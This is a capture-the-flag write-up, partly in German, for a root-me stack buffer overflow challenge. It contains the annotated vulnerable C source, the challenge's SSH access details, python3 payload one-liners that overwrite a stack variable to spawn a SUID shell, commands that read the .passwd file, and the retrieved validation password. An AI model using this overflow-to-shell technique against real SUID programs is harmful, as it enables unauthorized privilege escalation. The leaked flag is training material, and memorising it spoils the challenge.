* ELF x86 - Stack buffer overflow basic 1
|
|
Aufgabe
|
|
Einstellungen der Umgebung
|
|
PIE (Position Independent Executable): disabled
|
|
RelRO (Read-Only relocations): disabled
|
|
NX (Non-Executable Stack): disabled
|
|
Heap exec (Non-Executable Heap): disabled
|
|
ASLR (Address Space Layout Randomization): disabled
|
|
SF (Source Fortification): disabled
|
|
SRC (Zugriff auf den Source code): available
|
|
Quellcode
|
|
#+begin_src C
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
/*
 * root-me "ELF x86 - Stack buffer overflow basic 1" (ch13): a deliberately
 * vulnerable challenge binary. The code is reproduced unchanged so that it
 * matches the deployed target; the comments mark the vulnerability and the
 * assumptions the exploit below relies on.
 */
int main()
{

    int var;                    /* never used; only affects the stack layout */
    int check = 0x04030201;     /* sentinel the overflow has to overwrite */
    char buf[40];

    /*
     * VULN: the bound passed to fgets() is 45, not sizeof buf (40). fgets()
     * stores up to 44 input bytes plus a NUL terminator, i.e. up to 45 bytes
     * into a 40-byte array. Input bytes 40..43 land past the end of buf; on
     * the deployed build they overwrite `check` (compiler-chosen layout, not
     * something the language guarantees). The terminator spills one byte
     * further still.
     */
    fgets(buf,45,stdin);

    printf("\n[buf]: %s\n", buf);
    /* %p expects a pointer; passing an int is a format/argument mismatch.
       It happens to print correctly on this 32-bit build because both are
       4 bytes wide. */
    printf("[check] %p\n", check);

    /* Partial overwrite (anything but the original or target value). */
    if ((check != 0x04030201) && (check != 0xdeadbeef))
        printf ("\nYou are on the right way!\n");

    if (check == 0xdeadbeef)
    {
        printf("Hell yeah! You win!\nOpening your shell...\n");
        /* The binary is SUID: set the real uid to the effective one so the
           spawned bash keeps the elevated uid instead of dropping it back
           to the caller's real uid. */
        setreuid(geteuid(), geteuid());
        /* The shell inherits stdin; if stdin hits EOF right after the
           payload, bash exits immediately (see the exploitation notes). */
        system("/bin/bash");
        printf("Shell closed! Bye.\n");
    }
    return 0;
}
|
|
#+end_src
|
|
|
|
#+begin_quote
|
|
Zugangsdaten für die Übung
|
|
Host challenge02.root-me.org
|
|
Protokoll SSH
|
|
Port 2222
|
|
Zugang per SSH ssh -p 2222 app-systeme-ch13@challenge02.root-me.org
|
|
Benutzername app-systeme-ch13
|
|
Passwort app-systeme-ch13
|
|
#+end_quote
|
|
|
|
#+begin_src sh
|
|
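# 40 bytes fill buf[40]; the next 4 bytes overwrite `check` with 0xdeadbeef,
# packed little-endian (ef be ad de) by struct instead of hand-typed escapes.
python3 -c "import struct, sys; sys.stdout.buffer.write(b'A'*40 + struct.pack('<I', 0xdeadbeef))" | ./ch13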
|
|
#+end_src
|
|
|
|
** Findings (live target)
|
|
|
|
- Remote path: =/challenge/app-systeme/ch13=
|
|
- Binary: =ch13: setuid ELF 32-bit, dynamically linked, not stripped=
|
|
- Effective mitigations from runtime check (authoritative over the challenge page's table, which marks NX and RelRO as disabled; none of them matter here because the overflow only overwrites a data variable and never diverts control flow):
|
|
- Partial RELRO
|
|
- No stack canary
|
|
- NX enabled
|
|
- No PIE
|
|
- ASLR OFF (on target host)
|
|
- Vulnerability: =fgets(buf,45,stdin)= reads up to 44 bytes and appends a NUL, so it can write 45 bytes into =char buf[40]=. Input bytes 40..43 land in the adjacent =check= (the compiler happened to place it right above =buf= in this build — confirmed on the target, not guaranteed by C); the terminator spills one byte further, which is harmless for this exploit.
|
|
- Target value: overwrite =check= from =0x04030201= to =0xdeadbeef= (little-endian bytes =\xef\xbe\xad\xde=).
|
|
|
|
** Working exploitation flow
|
|
|
|
- Basic trigger (proves control of =check=):
|
|
|
|
#+begin_src sh
|
|
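# 40 bytes of filler, then 0xdeadbeef as little-endian bytes (ef be ad de)
# via struct.pack, so the byte order cannot be mistyped.
python3 -c "import struct, sys; sys.stdout.buffer.write(b'A'*40 + struct.pack('<I', 0xdeadbeef))" | ./ch13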
|
|
#+end_src
|
|
|
|
- With the payload alone, stdin reaches EOF right after =fgets()= and the spawned SUID shell exits immediately; keep stdin open by appending =cat= to the pipeline (it forwards your terminal input to the shell):
|
|
|
|
#+begin_src sh
|
|
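# The subshell first emits the 44-byte payload (40 filler bytes + 0xdeadbeef
# little-endian), then `cat` keeps the pipe open and forwards terminal input
# to the bash that ch13 spawns via system("/bin/bash"). Without `cat` the
# shell reads EOF and exits before any command can be issued.
(python3 -c "import struct, sys; sys.stdout.buffer.write(b'A'*40 + struct.pack('<I', 0xdeadbeef))"; cat) | ./ch13
# Commands below are typed into the spawned SUID shell, not into this script:
id
cat .passwd
exit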
|
|
#+end_src
|
|
|
|
- Observed privilege in spawned shell:
|
|
- =uid=1213(app-systeme-ch13-cracked)=
|
|
- =gid=1113(app-systeme-ch13)=
|
|
- Retrieved validation password:
|
|
- =1w4ntm0r3pr0np1s=
|
|
|
|
** Helper scripts
|
|
|
|
- =helper_recon.py=: SSH recon script (pwd, ls, file, checksec, smoke run).
|
|
- =helper_exploit_password.py=: SSH interactive exploit script that keeps stdin open and reads =.passwd=.
|